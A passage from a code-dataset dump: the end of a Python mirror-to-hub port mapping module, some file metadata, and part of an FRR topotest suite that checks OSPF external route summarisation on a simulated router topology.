{"mirror":31,"mirror_hub":9,"hub":2,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":0,"mirror_hub":10,"hub":2,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":6,"mirror_hub":11,"hub":2,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":13,"mirror_hub":12,"hub":2,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":21,"mirror_hub":13,"hub":2,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":30,"mirror_hub":14,"hub":2,"bonnet":2,"UD-port":0,"LR-port":1},
{"mirror":45,"mirror_hub":15,"hub":2,"bonnet":0,"UD-port":10,"LR-port":11}
],
"hub3":[
{"mirror":35,"mirror_hub":0,"hub":3,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":26,"mirror_hub":1,"hub":3,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":25,"mirror_hub":2,"hub":3,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":18,"mirror_hub":3,"hub":3,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":17,"mirror_hub":4,"hub":3,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":16,"mirror_hub":5,"hub":3,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":11,"mirror_hub":6,"hub":3,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":10,"mirror_hub":7,"hub":3,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":9,"mirror_hub":8,"hub":3,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":8,"mirror_hub":9,"hub":3,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":5,"mirror_hub":10,"hub":3,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":4,"mirror_hub":11,"hub":3,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":3,"mirror_hub":12,"hub":3,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":2,"mirror_hub":13,"hub":3,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":1,"mirror_hub":14,"hub":3,"bonnet":2,"UD-port":0,"LR-port":1}
],
"hub4":[
{"mirror":46,"mirror_hub":0,"hub":4,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":47,"mirror_hub":1,"hub":4,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":36,"mirror_hub":2,"hub":4,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":48,"mirror_hub":3,"hub":4,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":37,"mirror_hub":4,"hub":4,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":27,"mirror_hub":5,"hub":4,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":49,"mirror_hub":6,"hub":4,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":38,"mirror_hub":7,"hub":4,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":28,"mirror_hub":8,"hub":4,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":19,"mirror_hub":9,"hub":4,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":50,"mirror_hub":10,"hub":4,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":39,"mirror_hub":11,"hub":4,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":29,"mirror_hub":12,"hub":4,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":20,"mirror_hub":13,"hub":4,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":12,"mirror_hub":14,"hub":4,"bonnet":2,"UD-port":0,"LR-port":1}
],
"hub5":[
{"mirror":56,"mirror_hub":0,"hub":5,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":66,"mirror_hub":1,"hub":5,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":57,"mirror_hub":2,"hub":5,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":75,"mirror_hub":3,"hub":5,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":67,"mirror_hub":4,"hub":5,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":58,"mirror_hub":5,"hub":5,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":83,"mirror_hub":6,"hub":5,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":76,"mirror_hub":7,"hub":5,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":68,"mirror_hub":8,"hub":5,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":59,"mirror_hub":9,"hub":5,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":90,"mirror_hub":10,"hub":5,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":84,"mirror_hub":11,"hub":5,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":77,"mirror_hub":12,"hub":5,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":69,"mirror_hub":13,"hub":5,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":60,"mirror_hub":14,"hub":5,"bonnet":2,"UD-port":0,"LR-port":1}
],
"hub6":[
{"mirror":55,"mirror_hub":0,"hub":6,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":64,"mirror_hub":1,"hub":6,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":65,"mirror_hub":2,"hub":6,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":72,"mirror_hub":3,"hub":6,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":73,"mirror_hub":4,"hub":6,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":74,"mirror_hub":5,"hub":6,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":79,"mirror_hub":6,"hub":6,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":80,"mirror_hub":7,"hub":6,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":81,"mirror_hub":8,"hub":6,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":82,"mirror_hub":9,"hub":6,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":85,"mirror_hub":10,"hub":6,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":86,"mirror_hub":11,"hub":6,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":87,"mirror_hub":12,"hub":6,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":88,"mirror_hub":13,"hub":6,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":89,"mirror_hub":14,"hub":6,"bonnet":2,"UD-port":0,"LR-port":1}
]
} #end of mirror_hub mappings
mirrormappings=[
{"mirror":0,"mirror_hub":10,"hub":2,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":1,"mirror_hub":14,"hub":3,"bonnet":2,"UD-port":0,"LR-port":1},
{"mirror":2,"mirror_hub":13,"hub":3,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":3,"mirror_hub":12,"hub":3,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":4,"mirror_hub":11,"hub":3,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":5,"mirror_hub":10,"hub":3,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":6,"mirror_hub":11,"hub":2,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":7,"mirror_hub":6,"hub":2,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":8,"mirror_hub":9,"hub":3,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":9,"mirror_hub":8,"hub":3,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":10,"mirror_hub":7,"hub":3,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":11,"mirror_hub":6,"hub":3,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":12,"mirror_hub":14,"hub":4,"bonnet":2,"UD-port":0,"LR-port":1},
{"mirror":13,"mirror_hub":12,"hub":2,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":14,"mirror_hub":7,"hub":2,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":15,"mirror_hub":3,"hub":2,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":16,"mirror_hub":5,"hub":3,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":17,"mirror_hub":4,"hub":3,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":18,"mirror_hub":3,"hub":3,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":19,"mirror_hub":9,"hub":4,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":20,"mirror_hub":13,"hub":4,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":21,"mirror_hub":13,"hub":2,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":22,"mirror_hub":8,"hub":2,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":23,"mirror_hub":4,"hub":2,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":24,"mirror_hub":1,"hub":2,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":25,"mirror_hub":2,"hub":3,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":26,"mirror_hub":1,"hub":3,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":27,"mirror_hub":5,"hub":4,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":28,"mirror_hub":8,"hub":4,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":29,"mirror_hub":12,"hub":4,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":30,"mirror_hub":14,"hub":2,"bonnet":2,"UD-port":0,"LR-port":1},
{"mirror":31,"mirror_hub":9,"hub":2,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":32,"mirror_hub":5,"hub":2,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":33,"mirror_hub":2,"hub":2,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":34,"mirror_hub":0,"hub":2,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":35,"mirror_hub":0,"hub":3,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":36,"mirror_hub":2,"hub":4,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":37,"mirror_hub":4,"hub":4,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":38,"mirror_hub":7,"hub":4,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":39,"mirror_hub":11,"hub":4,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":40,"mirror_hub":10,"hub":1,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":41,"mirror_hub":6,"hub":1,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":42,"mirror_hub":3,"hub":1,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":43,"mirror_hub":1,"hub":1,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":44,"mirror_hub":0,"hub":1,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":45,"mirror_hub":15,"hub":2,"bonnet":0,"UD-port":10,"LR-port":11},
{"mirror":46,"mirror_hub":0,"hub":4,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":47,"mirror_hub":1,"hub":4,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":48,"mirror_hub":3,"hub":4,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":49,"mirror_hub":6,"hub":4,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":50,"mirror_hub":10,"hub":4,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":51,"mirror_hub":11,"hub":1,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":52,"mirror_hub":7,"hub":1,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":53,"mirror_hub":4,"hub":1,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":54,"mirror_hub":2,"hub":1,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":55,"mirror_hub":0,"hub":6,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":56,"mirror_hub":0,"hub":5,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":57,"mirror_hub":2,"hub":5,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":58,"mirror_hub":5,"hub":5,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":59,"mirror_hub":9,"hub":5,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":60,"mirror_hub":14,"hub":5,"bonnet":2,"UD-port":0,"LR-port":1},
{"mirror":61,"mirror_hub":12,"hub":1,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":62,"mirror_hub":8,"hub":1,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":63,"mirror_hub":5,"hub":1,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":64,"mirror_hub":1,"hub":6,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":65,"mirror_hub":2,"hub":6,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":66,"mirror_hub":1,"hub":5,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":67,"mirror_hub":4,"hub":5,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":68,"mirror_hub":8,"hub":5,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":69,"mirror_hub":13,"hub":5,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":70,"mirror_hub":13,"hub":1,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":71,"mirror_hub":9,"hub":1,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":72,"mirror_hub":3,"hub":6,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":73,"mirror_hub":4,"hub":6,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":74,"mirror_hub":5,"hub":6,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":75,"mirror_hub":3,"hub":5,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":76,"mirror_hub":7,"hub":5,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":77,"mirror_hub":12,"hub":5,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":78,"mirror_hub":14,"hub":1,"bonnet":2,"UD-port":0,"LR-port":1},
{"mirror":79,"mirror_hub":6,"hub":6,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":80,"mirror_hub":7,"hub":6,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":81,"mirror_hub":8,"hub":6,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror":82,"mirror_hub":9,"hub":6,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror":83,"mirror_hub":6,"hub":5,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":84,"mirror_hub":11,"hub":5,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":85,"mirror_hub":10,"hub":6,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror":86,"mirror_hub":11,"hub":6,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror":87,"mirror_hub":12,"hub":6,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror":88,"mirror_hub":13,"hub":6,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror":89,"mirror_hub":14,"hub":6,"bonnet":2,"UD-port":0,"LR-port":1},
{"mirror":90,"mirror_hub":10,"hub":5,"bonnet":1,"UD-port":0,"LR-port":1}
]#end of mirror mappings
def getMirrorAddresses(mirror):
if mirror<0 or mirror>=91:
raise Exception('error', 'mirrormap.py invalid mirror ID:'+str(mirror))
return (mirrormappings[mirror])
def getMirrorHubAddresses(hub, mirror_hub):
if type(hub) is int:
hub = 'hub' + str(hub)
elif type(hub) is str:
if len(hub) == 1:
hub = 'hub' + hub;
else:
pass
return (hubmappings[hub][mirror_hub])
def getMirrorHubAddress(mirror):
if mirror<0 or mirror>=91:
raise Exception('error', 'mirrormap.py invalid mirror ID:'+str(mirror))
return (mirrormappings[mirror]['mirror_hub'])
def getMirrorAddress(hub, mirror_hub):
if type(hub) is int:
hub = 'hub' + str(hub)
elif type(hub) is str:
if len(hub) == 1:
hub = 'hub' + hub;
else:
pass
return (hubmappings[hub][mirror_hub]['mirror'])
def getHubNumber(mirror):
if mirror<0 or mirror>=91:
raise Exception('error', 'mirrormap.py invalid mirror ID:'+str(mirror))
return (mirrormappings[mirror]['hub'])
| 54.842105
| 119
| 0.621041
| 3,196
| 16,672
| 3.180538
| 0.089174
| 0.168224
| 0.054894
| 0.079292
| 0.805312
| 0.805312
| 0.798623
| 0.798623
| 0.794491
| 0.791736
| 0
| 0.085893
| 0.053083
| 16,672
| 303
| 120
| 55.023102
| 0.557991
| 0.119962
| 0
| 0.723684
| 0
| 0
| 0.496547
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02193
| false
| 0.008772
| 0
| 0
| 0.04386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64dfa0c69d18250e9161aefd53d7c0e99359f165
| 111,960
|
py
|
Python
|
src/frr/tests/topotests/ospf_basic_functionality/test_ospf_asbr_summary_topo1.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
src/frr/tests/topotests/ospf_basic_functionality/test_ospf_asbr_summary_topo1.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
src/frr/tests/topotests/ospf_basic_functionality/test_ospf_asbr_summary_topo1.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright (c) 2020 by VMware, Inc. ("VMware")
# Used Copyright (c) 2018 by Network Device Education Foundation, Inc.
# ("NetDEF") in this file.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose with or without fee is hereby granted, provided
# that the above copyright notice and this permission notice appear
# in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
#
"""OSPF Summarisation Functionality Automation."""
import os
import sys
import time
import pytest
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
sys.path.append(os.path.join(CWD, "../lib/"))
# pylint: disable=C0413
# Import topogen and topotest helpers
from lib.topogen import Topogen, get_topogen
import ipaddress
from time import sleep
# Import topoJson from lib, to create topology and initial configuration
from lib.common_config import (
start_topology,
write_test_header,
kill_router_daemons,
write_test_footer,
reset_config_on_routers,
stop_router,
start_router,
verify_rib,
create_static_routes,
step,
start_router_daemons,
create_route_maps,
shutdown_bringup_interface,
topo_daemons,
create_prefix_lists,
create_route_maps,
create_interfaces_cfg,
)
from lib.topolog import logger
from lib.topojson import build_config_from_json
from lib.ospf import (
verify_ospf_neighbor,
clear_ospf,
verify_ospf_rib,
create_router_ospf,
verify_ospf_summary,
)
pytestmark = [pytest.mark.ospfd, pytest.mark.staticd]
# Global variables
topo = None
NETWORK = {
"ipv4": [
"11.0.20.1/32",
"11.0.20.2/32",
"11.0.20.3/32",
"11.0.20.4/32",
"11.0.20.5/32",
]
}
NETWORK_11 = {"ipv4": ["11.0.20.6/32", "11.0.20.7/32"]}
NETWORK2 = {
"ipv4": [
"12.0.20.1/32",
"12.0.20.2/32",
"12.0.20.3/32",
"12.0.20.4/32",
"12.0.20.5/32",
]
}
SUMMARY = {"ipv4": ["11.0.0.0/8", "12.0.0.0/8", "11.0.0.0/24"]}
"""
TOPOOLOGY =
Please view in a fixed-width font such as Courier.
+---+ A0 +---+
+R1 +------------+R2 |
+-+-+- +--++
| -- -- |
| -- A0 -- |
A0| ---- |
| ---- | A0
| -- -- |
| -- -- |
+-+-+- +-+-+
+R0 +-------------+R3 |
+---+ A0 +---+
TESTCASES =
1. OSPF summarisation functionality.
2. OSPF summarisation with metric type 2.
3. OSPF summarisation with Tag option
4. OSPF summarisation with advertise and no advertise option
5. OSPF summarisation Chaos.
6. OSPF summarisation with route map filtering.
7. OSPF summarisation with route map modification of metric type.
8. OSPF CLI Show verify ospf ASBR summary config and show commands behaviours.
"""
def setup_module(mod):
"""
Sets up the pytest environment
* `mod`: module name
"""
testsuite_run_time = time.asctime(time.localtime(time.time()))
logger.info("Testsuite start time: {}".format(testsuite_run_time))
logger.info("=" * 40)
logger.info("Running setup_module to create topology")
# This function initiates the topology build with Topogen...
json_file = "{}/ospf_asbr_summary_topo1.json".format(CWD)
tgen = Topogen(json_file, mod.__name__)
global topo
topo = tgen.json_topo
# ... and here it calls Mininet initialization functions.
# get list of daemons needs to be started for this suite.
daemons = topo_daemons(tgen, topo)
# Starting topology, create tmp files which are loaded to routers
# to start deamons and then start routers
start_topology(tgen, daemons)
# Creating configuration from JSON
build_config_from_json(tgen, topo)
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Api call verify whether OSPF is converged
ospf_covergence = verify_ospf_neighbor(tgen, topo)
assert ospf_covergence is True, "setup_module :Failed \n Error:" " {}".format(
ospf_covergence
)
logger.info("Running setup_module() done")
def teardown_module(mod):
"""
Teardown the pytest environment.
* `mod`: module name
"""
logger.info("Running teardown_module to delete topology")
tgen = get_topogen()
# Stop toplogy and Remove tmp files
tgen.stop_topology()
logger.info(
"Testsuite end time: {}".format(time.asctime(time.localtime(time.time())))
)
logger.info("=" * 40)
def red_static(dut, config=True):
"""
Local 'def' for Redstribute static routes inside ospf.
Parameters
----------
* `dut` : DUT on which configs have to be made.
* `config` : True or False, True by default for configure, set False for
unconfiguration.
"""
global topo
tgen = get_topogen()
if config:
ospf_red = {dut: {"ospf": {"redistribute": [{"redist_type": "static"}]}}}
else:
ospf_red = {
dut: {"ospf": {"redistribute": [{"redist_type": "static", "delete": True}]}}
}
result = create_router_ospf(tgen, topo, ospf_red)
assert result is True, "Testcase : Failed \n Error: {}".format(result)
def red_connected(dut, config=True):
"""
Local 'def' for Redstribute connected routes inside ospf
Parameters
----------
* `dut` : DUT on which configs have to be made.
* `config` : True or False, True by default for configure, set False for
unconfiguration.
"""
global topo
tgen = get_topogen()
if config:
ospf_red = {dut: {"ospf": {"redistribute": [{"redist_type": "connected"}]}}}
else:
ospf_red = {
dut: {
"ospf": {"redistribute": [{"redist_type": "connected", "delete": True}]}
}
}
result = create_router_ospf(tgen, topo, ospf_red)
assert result is True, "Testcase: Failed \n Error: {}".format(result)
# ##################################
# Test cases start here.
# ##################################
def test_ospf_type5_summary_tc43_p0(request):
"""OSPF summarisation with metric type 2."""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
reset_config_on_routers(tgen)
protocol = "ospf"
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5" " routes to one route."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Change the summary address mask to lower match (ex - 16 to 8)")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "16"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict = {
"11.0.0.0/16": {
"Summary address": "11.0.0.0/16",
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step(
"Verify that external routes(static / connected) are summarised"
" to configured summary address with newly configured mask."
)
input_dict_summary = {"r0": {"static_routes": [{"network": "11.0.0.0/16"}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Change the summary address mask to higher match (ex - 8 to 24)")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "24"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict = {
"11.0.0.0/16": {
"Summary address": "11.0.0.0/24",
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 0,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step(
"Verify that external routes(static / connected) are summarised"
" to configured summary address with newly configured mask."
)
step("Configure 2 summary address with different mask of same network.")
step(
"Verify that external routes(static / connected) are summarised "
"to configured summary address with highest match."
)
input_dict_summary = {"r0": {"static_routes": [{"network": "11.0.0.0/16"}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(" Un configure one of the summary address.")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "24",
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes(static / connected) are summarised"
" to configured summary address with newly configured mask."
)
input_dict_summary = {"r0": {"static_routes": [{"network": "11.0.0.0/16"}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "24"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes(static / connected) are summarised "
"to configured summary address with highest match."
)
input_dict_summary = {"r0": {"static_routes": [{"network": "11.0.0.0/16"}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
write_test_footer(tc_name)
def test_ospf_type5_summary_tc48_p0(request):
